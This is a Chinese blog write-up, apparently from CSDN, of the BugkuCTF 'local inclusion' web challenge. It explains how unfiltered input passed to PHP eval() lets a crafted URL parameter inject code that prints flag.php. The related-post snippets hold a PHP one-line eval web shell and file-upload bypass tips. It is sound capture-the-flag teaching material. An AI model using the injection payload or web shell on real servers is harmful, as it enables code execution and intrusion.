BugkuCTF-WEB-本地包含

最新推荐文章于 2021-09-08 23:23:08 发布
最新推荐文章于 2021-09-08 23:23:08 发布
阅读量613 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: BugkuCTF 文章标签: Bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_34449006/article/details/84112205
本文介绍了如何通过本地包含漏洞在Bugku CTF中获取flag。通过研究$_REQUEST函数,发现可能存在SQL漏洞和变量覆盖。利用未过滤的hello变量,通过GET或POST方法操纵$a变量,结合eval函数特性,可以构造URL输出flag.php内容。方法一是使用print_r(file('./flag.php'));,方法二是利用file_get_contents()函数读取flag.php。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目提示,需要将flag.php包含进去才可以得到flag

百度了一下$_REQUEST函数,发现易存在sql漏洞和变量漏洞覆盖

第二句话要获得hello的值,由于hello为’hello’,所以无论在url栏中对hello赋任何值,都会全盘接受,其中var_dump()是将变量a打印到界面中,在根据eval函数的特性(计算后面括号中的表达式)

SO——

  (1)a变量由$_REQUEST变量获取,可以用GET或POST方法为hello赋值进而为$a赋值

  (2)程序并未对hello的输入进行判断过滤

  (3)eval函数中执行的命令进而可以被$a的值所决定

方法一:构造方法来输出flag.php

http://123.206.87.240:8003/?hello=);print_r(file("./flag.php"));%23

<?php 
    include "flag.php"; 
    $a = @$_REQUEST['hello']; 
    eval( "var_dump($a);"); //eval("var_dump();print_r(file("./flag.php")
最低0.47元/天 解锁文章

200万优质内容无限畅学
bugku Web write up 一
0verWatch的博客
02-14 2819
web2 view-source:查看源码即可 文件上传测试 上传一个PHP文件发现他要的是图片文件,抓包先改一下content-type为image/jpeg,Go一下发现flag 计算器 F12调出开发者工具,把maxlength改为更长的长度即可 web基础$_GET 完全就是考php基础,直接URL加上index.php?what=flag即可 web...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2222
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BugkuCTFWeb--本地包含
VZZmieshenquan的博客
02-19 420
Description: 地址:http://123.206.87.240:8003/ 这个地址已经不行了,故本文为转载,源于:https://blog.csdn.net/dyw_666666/article/details/82389457#comments该文章 Solution: 题目内容为: 方法一: eval存在命令执行漏洞,使用hello构造payload http://1...
BugKuCTF WEB 本地包含
无限迭代中......
07-07 414
http://123.206.87.240:8003/ 题解: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 原理: $_REQUEST[]支持det、post两种方式发送...
Bugkuweb本地包含(wp)
我还在的博客
10-29 2176
0x00 前言 这是Bugkuweb中的一道名为本地包含的题目。考察对PHP的知识。 0x01 解题过程 打开链接,你会看到一段PHP代码。 分析这段代码,最终得到攻击思路:通过构造名字为hello的攻击命令,把flag.php里面的代码以数组形式输出出来。 回车,则会看到flag ...
bugku本地包含
Seaern的博客
06-24 940
bugku本地包含 题目链接 页面提示: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 代码分析 includeflag.php”: include 语句包含并运行指定文件。 $...
BugkuCTF-WEB题文件上传
am_03的博客
09-08 2505
启动场景 发现是文件上传 只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件 PHP文件里写入一句话木马 <?php @eval($_POST[caidao]);?> 使用burp抓包,不断尝试发现发现需要修改的地方有三个: 一个是http head里的Content-Type: multipart/form-data; 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data (其t为大写) Multipart里的部分字母
CTF平台题库writeup(二)--BugKuCTF-WEB(部分)
渗透、攻防、CTF、编程
06-26 4387
web2 flag在源码的注释里 计算器 改一下text文本框的最大输入位数>1即可 web基础$_GET GET方式传参即可 web基础$_POST post方式传参即可 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 这题要求传参num不能是数字,而且num=1,一开始没有什么思路,认为是弱类型的绕过,传了true进去,发现无效,问
渗透漏洞Bugku CTF-Web8
weixin_52514668的博客
04-30 531
Bugku CTF-Web8一.开启环境二. 分析代码,发现本地文件包含漏洞三. 获取flag.开启环境 二. 分析代码,发现本地文件包含漏洞 直接将flag.php文件读入变量hello中 访问 三. 获取flag
BugKuCTFweb 本地包含;变量1
s0il的博客
01-07 1469
本地包含 文件包含漏洞: 为提高重用率,常把多次用到的代码写到一个 文件中,使用头文件方式进行代码的调用。 为了灵活,被调用的文件被命名为变量,但缺少对这个变量的限制 ,对文件名缺少合理的校验,或者校验被绕过,进而操作了意料之外的文件,导致文件泄露及恶意代码注入,从而导致用户可获取一定的服务器权限,文件包含在服务器本地则是本地包含包含在第三方服务网站就是远程包含。 几乎所有脚本语言都会提...
BugKuCTF web本地包含
Superpig的博客
11-05 874
原题链接: 本地包含 分析: 第二行可知,flagflag.php里,倒数第二行show_source(__FILE__)很明显的提示 $_REQUEST[]支持det、post两种方式发送过来的请求,很明显接收了hello参数的值 var_dump()函数 显示关于一个或多个表达式的结构信息,包括表达式的类型与值;数组将递归展开值,通过缩进显示其结构 eval()函数把字符串按照 PHP...
ctf.show WEB入门-php特性系列
~airrudder~
09-21 2195
WEB入门 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 由于intval(array(.
本地包含
yumengzth的博客
08-01 1840
        进去之后看到如下代码:   &lt;?php      include "flag.php";      $a = @$_REQUEST['hello'];      eval( "var_dump($a);");      show_source(__FILE__);  ?&gt;   $_REQUEST[ ] 默认情况下包含...
CTF---Web---文件包含---10---三种本地包含
qq_22160557的博客
07-29 1114
文章目录前言一、题目描述二、逻辑解析三、解题方法1、将flag.php读入变量hello中2、 eval存在命令执行漏洞,用hello构造payload3、构造伪协议四、总结 前言 题目分类: CTF—Web—文件包含—10—三种本地包含 一、题目描述 题目: 文件包含 二、逻辑解析 <?php include "flag.php"; //可知flagflag.php里, $a = @$_REQUEST['hello']; //$_REQUEST[]支持get
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3596
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
PHP代码审计基础:变量覆盖漏洞
1匹黑马
12-06 557
文章目录变量覆盖危害挖掘思路$$变量覆盖extract()变量覆盖 变量覆盖 变量覆盖,是指变量未初始化,我们定义的参数值,可以替换程序原有的变量值。 危害 通常结合程序其他的漏洞实现完整的攻击。比如文件上传,覆盖掉原来白名单的列表,导致任意文件上传;用户注册界面控制没有覆盖的变量,导致SQL注入 挖掘思路 主要还是以下几个函数 extract() import_request_variables() parse_str() $$ $$变量覆盖 测试代码: <?php /*extract(
ctfshowPHP特性
遇事不决冲冲冲
08-23 4667
web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 数组绕过正则表达式,也就是说我们不按规定去
[CTFSHOW]PHP特性
Huamang的博客
03-19 1859
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 利用数组绕过:/?num[]=0 web 90 include
php反序列化总结(二)
qq_43801002的博客
05-17 629
反序列化与POP CHAIN POP CHAIN:把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与类中的敏感函数和属性相关联,就是POP CHAIN 。此时类中所有的敏感属性都属于可控的。当unserialize()传入的参数可控,便可以通过反序列化漏洞控制POP CHAIN达到利用特定漏洞的效果。 通俗点就是:反序列化中,如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 举一个小例子
PHP在CTF-Web挑战中的实战应用技巧
这涉及到许多方面,包括但不限于防止SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)、文件包含、会话劫持、目录遍历、服务端请求伪造(SSRF)等。在CTF挑战中,经常会出现模拟这些攻击的环节,以考验参赛者的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值